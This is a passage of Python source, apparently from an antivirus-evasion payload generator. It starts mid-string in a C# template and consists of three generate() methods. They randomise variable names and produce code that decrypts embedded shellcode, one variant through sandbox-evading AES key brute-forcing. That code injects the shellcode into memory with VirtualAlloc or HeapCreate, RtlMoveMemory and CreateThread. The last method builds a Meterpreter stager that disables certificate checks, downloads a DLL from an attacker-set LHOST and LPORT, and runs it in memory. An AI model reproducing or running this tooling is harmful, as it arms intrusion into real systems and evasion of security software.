%s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % ( shellcodeName) payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() RandPtr = evasion_helpers.randomString() RandHt = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() known_plaintext_string = evasion_helpers.randomString() plaintext_string_variable = evasion_helpers.randomString() key_guess = evasion_helpers.randomString() secret_key = evasion_helpers.randomString() small_constrained_key_variable = evasion_helpers.randomString() decoded_ciphertext = evasion_helpers.randomString() decoded_known = evasion_helpers.randomString() decoded_shellcode = evasion_helpers.randomString() RandCipherObject = evasion_helpers.randomString() RandPadding = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string) encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize everything, yo' sumMethodName = evasion_helpers.randomString() checkinMethodName = evasion_helpers.randomString() randLettersName = evasion_helpers.randomString() randLetterSubName = evasion_helpers.randomString() randBaseName = evasion_helpers.randomString() downloadMethodName = evasion_helpers.randomString() hostName = evasion_helpers.randomString() portName = evasion_helpers.randomString() requestName = evasion_helpers.randomString() tName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() dataName = evasion_helpers.randomString() byteArrayName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() bufName = evasion_helpers.randomString() handleName = evasion_helpers.randomString() data2Name = evasion_helpers.randomString() proxy_var = evasion_helpers.randomString() opener_var = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # helper method that returns the sum of all ord values in a string % 0x100 payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n" payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % ( sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payload_code += "def %s():\n\tfor x in range(64):\n" % ( checkinMethodName) payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % ( randBaseName) payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % ( randLettersName) payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName, randLettersName) payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % ( sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName, portName) payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n" payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n" payload_code += "\turllib.request.install_opener(" + opener_var + ")\n" payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" payload_code += "\ttry:\n" payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName, requestName) payload_code += "\t\ttry:\n" payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % ( tName, tName) payload_code += "\t\t\telse: return ''\n" payload_code += "\t\texcept: return %s.read()\n" % (tName) payload_code += "\texcept urllib.request.URLError: return ''\n" # method to inject a reflective .dll into memory payload_code += "def %s(%s):\n" % (injectMethodName, dataName) payload_code += "\tif %s != \"\":\n" % (dataName) payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n" payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n" # Assuming heap injection else: HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the metpreter .dll and inject it payload_code += "%s = ''\n" % (data2Name) payload_code += "%s = %s(\"%s\", %s)\n" % ( data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += "%s(%s)\n" % (injectMethodName, data2Name) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return